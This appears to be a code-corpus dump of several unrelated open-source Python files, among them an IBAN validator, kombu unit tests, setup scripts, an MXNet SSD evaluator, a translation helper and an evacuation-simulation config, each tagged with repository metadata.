IBAN_CHAR_MAP = {
"A": "10",
"B": "11",
"C": "12",
"D": "13",
"E": "14",
"F": "15",
"G": "16",
"H": "17",
"I": "18",
"J": "19",
"K": "20",
"L": "21",
"M": "22",
"N": "23",
"O": "24",
"P": "25",
"Q": "26",
"R": "27",
"S": "28",
"T": "29",
"U": "30",
"V": "31",
"W": "32",
"X": "33",
"Y": "34",
"Z": "35"}
iban_validation_str = self._replace_all(
iban[
4:] +
iban[
0:4],
IBAN_CHAR_MAP)
valid = len(iban) == 21
valid &= iban[0:2].lower() in ['ch', 'li']
valid &= (int(iban_validation_str) % 97) == 1
return valid
def _prepare_date(self, format_date):
''' Returns date formatted to YYYYMMDD string '''
return format_date.strftime('%Y%m%d')
def _replace_all(self, text, char_map):
''' Replace the char_map in text '''
for k, v in char_map.iteritems():
text = text.replace(k, v)
return text
def _setup_properties(self, payment_order):
''' These properties are the same for all lines of the LSV file '''
if not payment_order.mode.bank_id.lsv_identifier:
raise exceptions.ValidationError(
_('Missing LSV identifier for account %s')
% payment_order.mode.bank_id.acc_number)
currency_obj = self.env['res.currency']
chf_id = currency_obj.search([('name', '=', 'CHF')])
rate = chf_id['rate_silent']
ben_bank_id = payment_order.mode.bank_id
properties = {
'treatment_type': self.treatment_type,
'currency': self.currency,
'seq_nb': 1,
'lsv_identifier': ben_bank_id.lsv_identifier.upper(),
'esr_party_number': ben_bank_id.esr_party_number,
'edat': self._prepare_date(
date.today()),
'rate': rate,
}
return properties
| ndtran/l10n-switzerland | l10n_ch_lsv_dd/wizard/lsv_export_wizard.py | Python | agpl-3.0 | 21,814 | 0 |
from __future__ import absolute_import, unicode_literals
import pickle
from io import StringIO, BytesIO
from kombu import version_info_t
from kombu import utils
from kombu.five import python_2_unicode_compatible
from kombu.utils.text import version_string_as_tuple
from kombu.tests.case import Case, Mock, patch, mock
@python_2_unicode_compatible
class OldString(object):
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
def split(self, *args, **kwargs):
return self.value.split(*args, **kwargs)
def rsplit(self, *args, **kwargs):
return self.value.rsplit(*args, **kwargs)
class test_kombu_module(Case):
def test_dir(self):
import kombu
self.assertTrue(dir(kombu))
class test_utils(Case):
def test_maybe_list(self):
self.assertEqual(utils.maybe_list(None), [])
self.assertEqual(utils.maybe_list(1), [1])
self.assertEqual(utils.maybe_list([1, 2, 3]), [1, 2, 3])
def test_fxrange_no_repeatlast(self):
self.assertEqual(list(utils.fxrange(1.0, 3.0, 1.0)),
[1.0, 2.0, 3.0])
def test_fxrangemax(self):
self.assertEqual(list(utils.fxrangemax(1.0, 3.0, 1.0, 30.0)),
[1.0, 2.0, 3.0, 3.0, 3.0, 3.0,
3.0, 3.0, 3.0, 3.0, 3.0])
self.assertEqual(list(utils.fxrangemax(1.0, None, 1.0, 30.0)),
[1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0])
def test_reprkwargs(self):
self.assertTrue(utils.reprkwargs({'foo': 'bar', 1: 2, 'k': 'v'}))
def test_reprcall(self):
self.assertTrue(
utils.reprcall('add', (2, 2), {'copy': True}),
)
class test_UUID(Case):
def test_uuid4(self):
self.assertNotEqual(utils.uuid4(),
utils.uuid4())
def test_uuid(self):
i1 = utils.uuid()
i2 = utils.uuid()
self.assertIsInstance(i1, str)
self.assertNotEqual(i1, i2)
class MyStringIO(StringIO):
def close(self):
pass
class MyBytesIO(BytesIO):
def close(self):
pass
class test_emergency_dump_state(Case):
@mock.stdouts
def test_dump(self, stdout, stderr):
fh = MyBytesIO()
utils.emergency_dump_state(
{'foo': 'bar'}, open_file=lambda n, m: fh)
self.assertDictEqual(
pickle.loads(fh.getvalue()), {'foo': 'bar'})
self.assertTrue(stderr.getvalue())
self.assertFalse(stdout.getvalue())
@mock.stdouts
def test_dump_second_strategy(self, stdout, stderr):
fh = MyStringIO()
def raise_something(*args, **kwargs):
raise KeyError('foo')
utils.emergency_dump_state(
{'foo': 'bar'},
open_file=lambda n, m: fh, dump=raise_something
)
self.assertIn('foo', fh.getvalue())
self.assertIn('bar', fh.getvalue())
self.assertTrue(stderr.getvalue())
self.assertFalse(stdout.getvalue())
class test_retry_over_time(Case):
def setup(self):
self.index = 0
class Predicate(Exception):
pass
def myfun(self):
if self.index < 9:
raise self.Predicate()
return 42
def errback(self, exc, intervals, retries):
interval = next(intervals)
sleepvals = (None, 2.0, 4.0, 6.0, 8.0, 10.0, 12.0, 14.0, 16.0, 16.0)
self.index += 1
self.assertEqual(interval, sleepvals[self.index])
return interval
@mock.sleepdeprived(module=utils)
def test_simple(self):
prev_count, utils.count = utils.count, Mock()
try:
utils.count.return_value = list(range(1))
x = utils.retry_over_time(self.myfun, self.Predicate,
errback=None, interval_max=14)
self.assertIsNone(x)
utils.count.return_value = list(range(10))
cb = Mock()
x = utils.retry_over_time(self.myfun, self.Predicate,
errback=self.errback, callback=cb,
interval_max=14)
self.assertEqual(x, 42)
self.assertEqual(self.index, 9)
cb.assert_called_with()
finally:
utils.count = prev_count
@mock.sleepdeprived(module=utils)
def test_retry_once(self):
with self.assertRaises(self.Predicate):
utils.retry_over_time(
self.myfun, self.Predicate,
max_retries=1, errback=self.errback, interval_max=14,
)
self.assertEqual(self.index, 1)
# no errback
with self.assertRaises(self.Predicate):
utils.retry_over_time(
self.myfun, self.Predicate,
max_retries=1, errback=None, interval_max=14,
)
@mock.sleepdeprived(module=utils)
def test_retry_always(self):
Predicate = self.Predicate
class Fun(object):
def __init__(self):
self.calls = 0
def __call__(self, *args, **kwargs):
try:
if self.calls >= 10:
return 42
raise Predicate()
finally:
self.calls += 1
fun = Fun()
self.assertEqual(
utils.retry_over_time(
fun, self.Predicate,
max_retries=0, errback=None, interval_max=14,
),
42,
)
self.assertEqual(fun.calls, 11)
class test_cached_property(Case):
def test_deleting(self):
class X(object):
xx = False
@utils.cached_property
def foo(self):
return 42
@foo.deleter # noqa
def foo(self, value):
self.xx = value
x = X()
del(x.foo)
self.assertFalse(x.xx)
x.__dict__['foo'] = 'here'
del(x.foo)
self.assertEqual(x.xx, 'here')
def test_when_access_from_class(self):
class X(object):
xx = None
@utils.cached_property
def foo(self):
return 42
@foo.setter # noqa
def foo(self, value):
self.xx = 10
desc = X.__dict__['foo']
self.assertIs(X.foo, desc)
self.assertIs(desc.__get__(None), desc)
self.assertIs(desc.__set__(None, 1), desc)
self.assertIs(desc.__delete__(None), desc)
self.assertTrue(desc.setter(1))
x = X()
x.foo = 30
self.assertEqual(x.xx, 10)
del(x.foo)
class test_symbol_by_name(Case):
def test_instance_returns_instance(self):
instance = object()
self.assertIs(utils.symbol_by_name(instance), instance)
def test_returns_default(self):
default = object()
self.assertIs(
utils.symbol_by_name('xyz.ryx.qedoa.weq:foz', default=default),
default,
)
def test_no_default(self):
with self.assertRaises(ImportError):
utils.symbol_by_name('xyz.ryx.qedoa.weq:foz')
def test_imp_reraises_ValueError(self):
imp = Mock()
imp.side_effect = ValueError()
with self.assertRaises(ValueError):
utils.symbol_by_name('kombu.Connection', imp=imp)
def test_package(self):
from kombu.entity import Exchange
self.assertIs(
utils.symbol_by_name('.entity:Exchange', package='kombu'),
Exchange,
)
self.assertTrue(utils.symbol_by_name(':Consumer', package='kombu'))
class test_ChannelPromise(Case):
def test_repr(self):
obj = Mock(name='cb')
self.assertIn(
'promise',
repr(utils.ChannelPromise(obj)),
)
obj.assert_not_called()
class test_entrypoints(Case):
@mock.mask_modules('pkg_resources')
def test_without_pkg_resources(self):
self.assertListEqual(list(utils.entrypoints('kombu.test')), [])
@mock.module_exists('pkg_resources')
def test_with_pkg_resources(self):
with patch('pkg_resources.iter_entry_points', create=True) as iterep:
eps = iterep.return_value = [Mock(), Mock()]
self.assertTrue(list(utils.entrypoints('kombu.test')))
iterep.assert_called_with('kombu.test')
eps[0].load.assert_called_with()
eps[1].load.assert_called_with()
class test_shufflecycle(Case):
def test_shuffles(self):
prev_repeat, utils.repeat = utils.repeat, Mock()
try:
utils.repeat.return_value = list(range(10))
values = {'A', 'B', 'C'}
cycle = utils.shufflecycle(values)
seen = set()
for i in range(10):
next(cycle)
utils.repeat.assert_called_with(None)
self.assertTrue(seen.issubset(values))
with self.assertRaises(StopIteration):
next(cycle)
next(cycle)
finally:
utils.repeat = prev_repeat
class test_version_string_as_tuple(Case):
def test_versions(self):
self.assertTupleEqual(
version_string_as_tuple('3'),
version_info_t(3, 0, 0, '', ''),
)
self.assertTupleEqual(
version_string_as_tuple('3.3'),
version_info_t(3, 3, 0, '', ''),
)
self.assertTupleEqual(
version_string_as_tuple('3.3.1'),
version_info_t(3, 3, 1, '', ''),
)
self.assertTupleEqual(
version_string_as_tuple('3.3.1a3'),
version_info_t(3, 3, 1, 'a3', ''),
)
self.assertTupleEqual(
version_string_as_tuple('3.3.1a3-40c32'),
version_info_t(3, 3, 1, 'a3', '40c32'),
)
self.assertEqual(
version_string_as_tuple('3.3.1.a3.40c32'),
version_info_t(3, 3, 1, 'a3', '40c32'),
)
class test_maybe_fileno(Case):
def test_maybe_fileno(self):
self.assertEqual(utils.maybe_fileno(3), 3)
f = Mock(name='file')
self.assertIs(utils.maybe_fileno(f), f.fileno())
f.fileno.side_effect = ValueError()
self.assertIsNone(utils.maybe_fileno(f))
| Elastica/kombu | kombu/tests/utils/test_utils.py | Python | bsd-3-clause | 10,301 | 0 |
from mongoengine import *
from models.zips import Zips
from geopy import distance
from geopy import Point
connect('scratch', host='mongodb://142.133.150.180/scratch')
# zipins = Zips(zipcode=999999, city="testlocation", loc=[1.0,1.0],pop=12345, state="ZZ").save()
locationList = []
location = {}
distanceList = []
for zip in Zips.objects:
locationList.append(zip)
for location1 in locationList:
if location1.city=="BEVERLY HILLS" :
point1 = Point(location1.loc[0], location1.loc[1])
for location2 in locationList:
if location1 != location2 and location2.city !="BEVERLY HILLS":
point2 = Point(location2.loc[0], location2.loc[1])
if(distance.distance(point1, point2) < 5):
distanceList.append(location2)
for location in distanceList:
print (location.city, location.zipcode)
| rainmakeross/python-dataanalysis | app.py | Python | apache-2.0 | 871 | 0.005741 |
from setuptools import setup
license = open('LICENSE.txt').read()
setup(
name='iloveck101',
version='0.5.2',
author='tzangms',
author_email='[email protected]',
packages=['iloveck101'],
url='https://github.com/tzangms/iloveck101',
license=license,
description='Download images from ck101 thread',
test_suite='tests',
long_description=open('README.md').read(),
entry_points = {
'console_scripts': [
'iloveck101 = iloveck101.iloveck101:main',
]
},
install_requires = [
"lxml==3.2.4",
"requests==2.0.1",
"gevent==1.0",
"more-itertools==2.2",
],
)
| tzangms/iloveck101 | setup.py | Python | mit | 662 | 0.006042 |
#pylint: disable=C0301, C0103, W0212, W0401
"""
.. module:: pilot
:platform: Unix
:synopsis: RADICAL-Pilot is a distributed Pilot-Job framework.
.. moduleauthor:: Ole Weidner <[email protected]>
"""
__copyright__ = "Copyright 2013-2014, http://radical.rutgers.edu"
__license__ = "MIT"
# ------------------------------------------------------------------------------
# Scheduler name constant
from types import *
from states import *
from logentry import *
from scheduler import *
# ------------------------------------------------------------------------------
#
from url import Url
from exceptions import *
from session import Session
from context import Context
from unit_manager import UnitManager
from compute_unit import ComputeUnit
from compute_unit_description import ComputeUnitDescription
from pilot_manager import PilotManager
from compute_pilot import ComputePilot
from compute_pilot_description import ComputePilotDescription
from resource_config import ResourceConfig
from staging_directives import COPY, LINK, MOVE, TRANSFER, SKIP_FAILED, CREATE_PARENTS
# ------------------------------------------------------------------------------
#
from utils.logger import logger
import os
import radical.utils as ru
import radical.utils.logger as rul
pwd = os.path.dirname (__file__)
root = "%s/.." % pwd
version, version_detail, version_branch, sdist_name, sdist_path = ru.get_version ([root, pwd])
# FIXME: the logger init will require a 'classical' ini based config, which is
# different from the json based config we use now. May need updating once the
# radical configuration system has changed to json
_logger = rul.logger.getLogger ('radical.pilot')
_logger.info ('radical.pilot version: %s' % version_detail)
# ------------------------------------------------------------------------------
| JensTimmerman/radical.pilot | src/radical/pilot/__init__.py | Python | mit | 1,882 | 0.020723 |
# -*- coding: utf-8 -*-
import unittest
from unittest.mock import patch
from hypothesis import given
from hypothesis.strategies import integers
from pokebase import APIResource, loaders
from pokebase.common import ENDPOINTS
def builder(func, func_name):
@given(id_=integers(min_value=1))
@patch('pokebase.interface.get_data')
def test(self, mock_get_data, id_):
mock_get_data.side_effect = [{'count': 1, 'results': [{'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, id_)}]},
{'simple_attr': 10, 'list_attr': [{'name': 'mocked name'}], 'complex_attr': {'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, 10)}},
{'count': 1, 'results': [{'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, id_)}]}]
self.assertIsInstance(func(id_), APIResource)
return test
class TestFunctions_loaders(unittest.TestCase):
@classmethod
def setUpClass(cls):
for endpoint in ENDPOINTS:
if endpoint in ['type']:
# special cases, need trailing underscore
func_name = ''.join([endpoint.replace('-', '_'), '_'])
else:
func_name = endpoint.replace('-', '_')
func = getattr(loaders, func_name)
setattr(cls, 'testLoader_{}'.format(func_name), builder(func, endpoint))
TestFunctions_loaders.setUpClass()
| GregHilmes/pokebase | tests/test_module_loaders.py | Python | bsd-3-clause | 1,399 | 0.004289 |
from __future__ import print_function
import os
import sys
import importlib
import mxnet as mx
from dataset.iterator import DetRecordIter
from config.config import cfg
from evaluate.eval_metric import MApMetric, VOC07MApMetric
import logging
from symbol.symbol_factory import get_symbol
def evaluate_net(net, path_imgrec, num_classes, mean_pixels, data_shape,
model_prefix, epoch, ctx=mx.cpu(), batch_size=1,
path_imglist="", nms_thresh=0.45, force_nms=False,
ovp_thresh=0.5, use_difficult=False, class_names=None,
voc07_metric=False, frequent=20):
"""
evalute network given validation record file
Parameters:
----------
net : str or None
Network name or use None to load from json without modifying
path_imgrec : str
path to the record validation file
path_imglist : str
path to the list file to replace labels in record file, optional
num_classes : int
number of classes, not including background
mean_pixels : tuple
(mean_r, mean_g, mean_b)
data_shape : tuple or int
(3, height, width) or height/width
model_prefix : str
model prefix of saved checkpoint
epoch : int
load model epoch
ctx : mx.ctx
mx.gpu() or mx.cpu()
batch_size : int
validation batch size
nms_thresh : float
non-maximum suppression threshold
force_nms : boolean
whether suppress different class objects
ovp_thresh : float
AP overlap threshold for true/false postives
use_difficult : boolean
whether to use difficult objects in evaluation if applicable
class_names : comma separated str
class names in string, must correspond to num_classes if set
voc07_metric : boolean
whether to use 11-point evluation as in VOC07 competition
frequent : int
frequency to print out validation status
"""
# set up logger
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# args
if isinstance(data_shape, int):
data_shape = (3, data_shape, data_shape)
assert len(data_shape) == 3 and data_shape[0] == 3
#model_prefix += '_' + str(data_shape[1])
# iterator
eval_iter = DetRecordIter(path_imgrec, batch_size, data_shape,
path_imglist=path_imglist, **cfg.valid)
# model params
load_net, args, auxs = mx.model.load_checkpoint(model_prefix, epoch)
# network
if net is None:
net = load_net
else:
net = get_symbol(net, data_shape[1], num_classes=num_classes,
nms_thresh=nms_thresh, force_suppress=force_nms)
if not 'label' in net.list_arguments():
label = mx.sym.Variable(name='label')
net = mx.sym.Group([net, label])
# init module
mod = mx.mod.Module(net, label_names=('label',), logger=logger, context=ctx,
fixed_param_names=net.list_arguments())
mod.bind(data_shapes=eval_iter.provide_data, label_shapes=eval_iter.provide_label)
mod.set_params(args, auxs, allow_missing=False, force_init=True)
# run evaluation
if voc07_metric:
metric = VOC07MApMetric(ovp_thresh, use_difficult, class_names,
roc_output_path=os.path.join(os.path.dirname(model_prefix), 'roc'))
else:
metric = MApMetric(ovp_thresh, use_difficult, class_names,
roc_output_path=os.path.join(os.path.dirname(model_prefix), 'roc'))
results = mod.score(eval_iter, metric, num_batch=None,
batch_end_callback=mx.callback.Speedometer(batch_size,
frequent=frequent,
auto_reset=False))
for k, v in results:
print("{}: {}".format(k, v))
| zhreshold/mxnet-ssd | evaluate/evaluate_net.py | Python | mit | 3,901 | 0.003076 |
import sys, os, multiprocessing, subprocess, time
src = os.path.abspath(os.path.join(os.path.dirname(__file__), 'src', 'sakia'))
res = os.path.abspath(os.path.join(os.path.dirname(__file__), 'res'))
pro_file_template = """
FORMS = {0}
SOURCES = {1}
TRANSLATIONS = {2}
"""
def generate_pro():
sources = []
forms = []
translations = []
project_filename = os.path.abspath(os.path.join(
os.path.dirname(__file__),
"sakia-ts-{0}".format(int(time.time()))))
for root, dirs, files in os.walk(src):
for f in files:
if f.endswith('.py') and not f.endswith('_uic.py'):
sources.append(os.path.join(root, f))
else:
continue
print(os.path.join(root, f))
for root, dirs, files in os.walk(res):
for f in files:
if f.endswith('.ui'):
forms.append(os.path.join(root, f))
elif f.endswith('.ts'):
translations.append(os.path.join(root, f))
else:
continue
print(os.path.join(root, f))
with open(project_filename, 'w') as outfile:
outfile.write(pro_file_template.format(""" \\
""".join(forms),
""" \\
""".join(sources),
""" \\
""".join(translations)))
return project_filename
pro_file = generate_pro()
try:
if "-noobsolete" in sys.argv:
print("Removing obsolete strings...")
subprocess.call(["pylupdate5", "-noobsolete", pro_file])
else:
subprocess.call(["pylupdate5", pro_file])
finally:
os.remove(pro_file)
| ucoin-io/cutecoin | update_ts.py | Python | mit | 1,724 | 0.00174 |
from soba.models.continuousModel import ContinuousModel
import soba.visualization.ramen.mapGenerator as ramen
import soba.run
from collections import OrderedDict
import json
from time import time
import sys
from model import SEBAModel
from visualization.back import Visualization
import datetime as dt
aStar = False
strategies = ['nearest', 'safest', 'uncrowded']
# Simulation configuration
today = dt.date.today()
timeHazard = "10:30:00"
#Only two are neccesary
families = [{'N': 4, 'child': 2, 'adult': 2}]
sebaConfiguration = {'families': [], 'hazard': timeHazard}
# Occupancy atributtes
jsonsOccupants = []
strategy = strategies[0]
N = 40
NDis = 0
fov = True
speed = 1.38
speedDis = 0.7
#states = OrderedDict([('Free time','out'), ('Rest', 'wp'), ('Lunch','out'), ('Work', 'wp')])
states = OrderedDict([('Free time','out'), ('Lunch','out'), ('Work', 'wp')])
schedule = {'t1': "09:00:00", 't2': "10:00:00", 't3': "11:00:00", 't4': "18:00:00"}
variation = {'t1': "00:50:00", 't2': "00:30:00", 't3': "00:30:00", 't4': "00:59:00"}
markovActivity = {
'-t1': [[100, 0, 0], [100, 0, 0], [100, 0, 0], [100, 0, 0]],
't1-t2': [[0, 0, 70], [0, 0, 90], [0, 0, 80], [0, 0, 60]],
't2-t3': [[100, 0, 0], [0, 20, 60], [20, 50, 40], [0, 70, 30]],
't3-t4': [[100, 0, 0], [0, 20, 60], [0, 0, 70], [20, 0, 70]],
't4-': [[100, 0, 0], [70, 0, 30], [70, 0, 30], [70, 0, 30]]
}
timeActivity = {
'-t1': [3, 0, 0], 't1-t2': [0, 0, 45], 't2-t3': [0, 50, 45], 't3-t4': [0, 20, 45], 't4-': [3, 10, 20]
}
timeActivityVariation = {
'-t1': [0, 0, 0], 't1-t2': [0, 0, 10], 't2-t3': [0, 10, 10], 't3-t4': [0, 5, 10], 't4-': [0,5, 10]
}
jsonOccupant = {'type': 'regular' , 'astar': aStar, 'N': N, 'states': states , 'schedule': schedule, 'variation': variation,
'markovActivity': markovActivity, 'timeActivity': timeActivity, 'timeActivityVariation': timeActivityVariation,
'strategy': strategy, 'speedEmergency': speed, 'shape': 'rect', 'fov': fov}
jsonsOccupants.append(jsonOccupant)
jsonOccupantDis = {'type': 'dis' , 'astar': aStar, 'N': NDis, 'states': states , 'schedule': schedule, 'variation': variation,
'markovActivity': markovActivity, 'timeActivity': timeActivity, 'timeActivityVariation': timeActivityVariation,
'strategy': strategy, 'speedEmergency': speedDis, 'fov': fov}
jsonsOccupants.append(jsonOccupantDis)
#with open('auxiliarFiles/labgsi.blueprint3d') as data_file:
# jsonMap = ramen.returnMap(data_file, offsety = 9, offsetx = 0)
#cellW = 20
#cellH = 20
#with open('auxiliarFiles/uclm_furniture1_new.blueprint3d') as data_file:
#jsonMap = ramen.returnMap(data_file, offsety = 21, offsetx = 0)
#cellW = 113
#cellH = 80
with open('auxiliarFiles/uclm_furniture2_new.blueprint3d') as data_file:
jsonMap = ramen.returnMap(data_file, offsety = 21, offsetx = 0)
cellW = 113
cellH = 80
if len(sys.argv) > 1 and sys.argv[1] == '-v':
back = Visualization(cellW, cellH)
parameters = {'width': cellW, 'height': cellH, 'jsonMap': jsonMap, 'jsonsOccupants': jsonsOccupants, 'sebaConfiguration': sebaConfiguration}
soba.run.run(SEBAModel, parameters, visualJS="visualization/front.js", back=back)
else:
fixed_params = {"width": cellW, "height": cellH, "jsonMap": jsonMap, "jsonsOccupants": jsonsOccupants, 'sebaConfiguration': sebaConfiguration}
variable_params = {"seed": range(10, 500, 10)}
soba.run.run(SEBAModel, fixed_params, variable_params) | gsi-upm/soba | projects/seba/run.py | Python | mit | 3,404 | 0.016745 |
#!/usr/bin/env python
"""
Copyright (c) 2012, Aaron Meier
All rights reserved.
See LICENSE for more information.
"""
from distutils.core import setup
import os
from gitgate import __version__
setup(name='gitgate',
version = __version__,
description = 'Dead simple gatekeeping code review for Git',
long_description = (
"GitGate provides a GUI frontend (via Flask) for pre-merge code review."
),
author = 'Aaron Meier',
author_email = '[email protected]',
packages = ['gitgate'],
package_dir={'gitgate':'gitgate'},
package_data={'gitgate':['templates/*', 'static/bootstrap3/*/*', 'static/jquery/*.js']},
scripts=['gitgate/scripts/gitgate'],
url = 'http://gitgate.nullism.com',
install_requires = ['peewee>=2.2.3', 'flask>=0.9', 'argparse>=1'],
license = 'MIT',
provides = ['gitgate']
)
| webgovernor/gitgate | setup.py | Python | mit | 856 | 0.031542 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
from builtins import zip
import pycrfsuite
def compareTaggers(model1, model2, string_list, module_name):
"""
Compare two models. Given a list of strings, prints out tokens & tags
whenever the two taggers parse a string differently. This is for spot-checking models
:param tagger1: a .crfsuite filename
:param tagger2: another .crfsuite filename
:param string_list: a list of strings to be checked
:param module_name: name of a parser module
"""
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
count_discrepancies = 0
for string in string_list:
tokens = module.tokenize(string)
if tokens:
features = module.tokens2features(tokens)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if tags1 != tags2:
count_discrepancies += 1
print('\n')
print("%s. %s" %(count_discrepancies, string))
print('-'*75)
print_spaced('token', model1, model2)
print('-'*75)
for token in zip(tokens, tags1, tags2):
print_spaced(token[0], token[1], token[2])
print("\n\n%s of %s strings were labeled differently"%(count_discrepancies, len(string_list)))
def print_spaced(s1, s2, s3):
n = 25
print(s1 + " "*(n-len(s1)) + s2 + " "*(n-len(s2)) + s3)
def validateTaggers(model1, model2, labeled_string_list, module_name):
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
wrong_count_1 = 0
wrong_count_2 = 0
wrong_count_both = 0
correct_count = 0
for labeled_string in labeled_string_list:
unlabeled_string, components = labeled_string
tokens = module.tokenize(unlabeled_string)
if tokens:
features = module.tokens2features(tokens)
_, tags_true = list(zip(*components))
tags_true = list(tags_true)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if (tags1 != tags_true) and (tags2 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("*%s: "%model1, tags1)
print("*%s: "%model2, tags2)
wrong_count_both += 1
elif (tags1 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("*%s: "%model1, tags1)
print("%s: "%model2, tags2)
wrong_count_1 += 1
elif (tags2 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("%s: "%model1, tags1)
print("*%s: "%model2, tags2)
wrong_count_2 += 1
else:
correct_count += 1
print("\n\nBOTH WRONG: ", wrong_count_both)
print("%s WRONG: %s" %(model1, wrong_count_1))
print("%s WRONG: %s" %(model2, wrong_count_2))
print("BOTH CORRECT: ", correct_count)
| et-al-Health/parserator | parserator/spotcheck.py | Python | mit | 3,434 | 0.004659 |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import unittest
sys.path.insert(0, os.path.abspath('..'))
import dxpad._contest as _contest
class SignalMonitor:
signal_received = False
signal_value = None
def __init__(self, signal):
signal.connect(self.signal_receiver)
def signal_receiver(self, value = None):
self.signal_received = True
self.signal_value = value
class TestCurrentQso(unittest.TestCase):
def test_create(self):
qso = _contest.CurrentQso(_contest.Exchange())
def test_next_increases_serial(self):
qso = _contest.CurrentQso(_contest.Exchange())
qso.next()
self.assertEqual(qso.serial, 2)
def test_next_updates_exchange_out(self):
exchange = _contest.SerialExchange()
qso = _contest.CurrentQso(exchange)
qso.serial = 123
qso.next()
self.assertEqual(exchange.serial, 124)
def test_next_clears_inputs(self):
qso = _contest.CurrentQso(_contest.SerialExchange())
qso.call = "the call"
qso.exchange_in = "the exchange in"
qso.call_valid = True
qso.exchange_in_valid = True
qso.complete = True
qso.next()
self.assertEqual(qso.call, "")
self.assertEqual(qso.exchange_in, "")
self.assertFalse(qso.call_valid)
self.assertFalse(qso.exchange_in_valid)
self.assertFalse(qso.complete)
def test_next_emits_changed_invalid_and_incomplete(self):
qso = _contest.CurrentQso(_contest.SerialExchange())
qso.call_valid = True
qso.exchange_in_valid = True
qso.complete = True
monitor_changed = SignalMonitor(qso.changed)
monitor_call = SignalMonitor(qso.call_is_valid)
monitor_exchange_in = SignalMonitor(qso.exchange_in_is_valid)
monitor_complete = SignalMonitor(qso.completed)
qso.next()
self.assertTrue(monitor_changed.signal_received)
self.assertTrue(monitor_call.signal_received)
self.assertFalse(monitor_call.signal_value)
self.assertTrue(monitor_exchange_in.signal_received)
self.assertFalse(monitor_exchange_in.signal_value)
self.assertTrue(monitor_complete.signal_received)
self.assertFalse(monitor_complete.signal_value)
def test_set_call_valid_emits_call_is_valid(self):
qso = _contest.CurrentQso(_contest.Exchange())
monitor = SignalMonitor(qso.call_is_valid)
qso.set_call("N1")
self.assertFalse(monitor.signal_received)
qso.set_call("N1MM")
self.assertTrue(monitor.signal_received)
self.assertTrue(monitor.signal_value)
def test_set_exchange_in_valid_emits_exchange_in_is_valid(self):
qso = _contest.CurrentQso(_contest.Exchange())
monitor = SignalMonitor(qso.exchange_in_is_valid)
qso.set_exchange_in("1")
self.assertTrue(monitor.signal_received)
self.assertTrue(monitor.signal_value)
class TestSerialExchange(unittest.TestCase):
def test_str_padding_with_zeros(self):
exchange = _contest.SerialExchange()
self.assertEqual(str(exchange), "599001")
def test_str_padding_only_to_three_digits(self):
exchange = _contest.SerialExchange()
exchange.serial = 1000
self.assertEqual(str(exchange), "5991000")
def test_next_uses_serial_of_qso(self):
exchange = _contest.SerialExchange()
qso = _contest.CurrentQso(exchange)
qso.serial = 123
exchange.next(qso)
self.assertEqual(exchange.serial, 123)
def test_next_emits_changed(self):
exchange = _contest.SerialExchange()
monitor = SignalMonitor(exchange.changed)
exchange.next(_contest.CurrentQso(exchange))
self.assertTrue(monitor.signal_received)
| ftl/dxpad | tests/test_contest.py | Python | mit | 3,821 | 0.001309 |
#!/usr/bin/env python
# https://github.com/svenkreiss/PyROOTUtils/blob/master/PyROOTUtils/Graph.py
__author__ = "Kyle Cranmer <[email protected]"
__version__ = "0.1"
'''
This is a research work in progress.
Define model mu_s*Gaus(x|alpha,sigma)+mu_b*flat(x)
Generate {x} for several {alpha}
Calculate power (expected significance) for some alpha using profile likelihood approach
1) Train NN for alpha=0.
1a) make (histfactory/on the fly) model for NN with alpha variations
- calculate power
1b) make pdf on the fly for each value of alpha
2) Train NN with {x,alpha}
a) make histfactory model for NN with alpha variations using same alpha as input to NN
- calculate power
b) make pdf on the fly for NN with alpha variations using same alpha as input to NN
- calculate power
'''
import ROOT
import numpy as np
from sklearn import svm, linear_model, gaussian_process
from sklearn.neural_network import BernoulliRBM
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import matplotlib.pyplot as plt
import os.path
def createdPdfForFixed():
'''
Read in learner saved in fixed.pkl
Evaluate outputs for several parameter points.
Generate histograms for each point.
(to do: create parametrized pdf that interpolates across these pdfs)
'''
clf = joblib.load('fixed.pkl')
trainAndTarget = np.loadtxt('traindata.dat')
traindata = trainAndTarget[:,0:2]
targetdata = trainAndTarget[:,2]
massPoints = np.unique(traindata[:,1])
fixedhists=[]
c1 = ROOT.TCanvas()
for j, name in enumerate(['sig','bkg']):
for i, mass in enumerate(massPoints):
#bkg part
#plt.hist(outputs[i*chunk+shift: \
# (i+1)*chunk+shift], 30, alpha=0.3)
#sig part
hist = ROOT.TH1F('h{0}hist{1}'.format(name,i),"hist",30,-0.1,1.2)
fixedhists.append(hist)
for val in outputs[i*chunk+j*shift: (i+1)*chunk+j*shift]:
hist.Fill(val)
if i==0:
hist.Draw()
else:
hist.Draw('same')
c1.SaveAs('roothists.pdf')
def createPdfForAdaptive_tree(tree):
'''
Read in learner saved in adaptive.pkl
Evaluate outputs for several parameter points, using true value for parameter
Generate histograms for each point.
create parametrized pdf that interpolates across these pdfs
'''
bins=30
low=0.
high=1.
# loop over the tree, build histograms of output for target=(0,1), different mx values
i=0
var_points = [ [] , [] ]
adaptivehists = [ [] , [] ]
while (tree.GetEntry(i)):
# have we seen this mx before?
try:
# if so, get the index
ind = var_points[int(tree.target)].index(tree.mx)
except ValueError:
# if no, add to our list and make a histogram for it, then get the index
var_points[int(tree.target)].append(tree.mx)
ind = var_points[int(tree.target)].index(tree.mx)
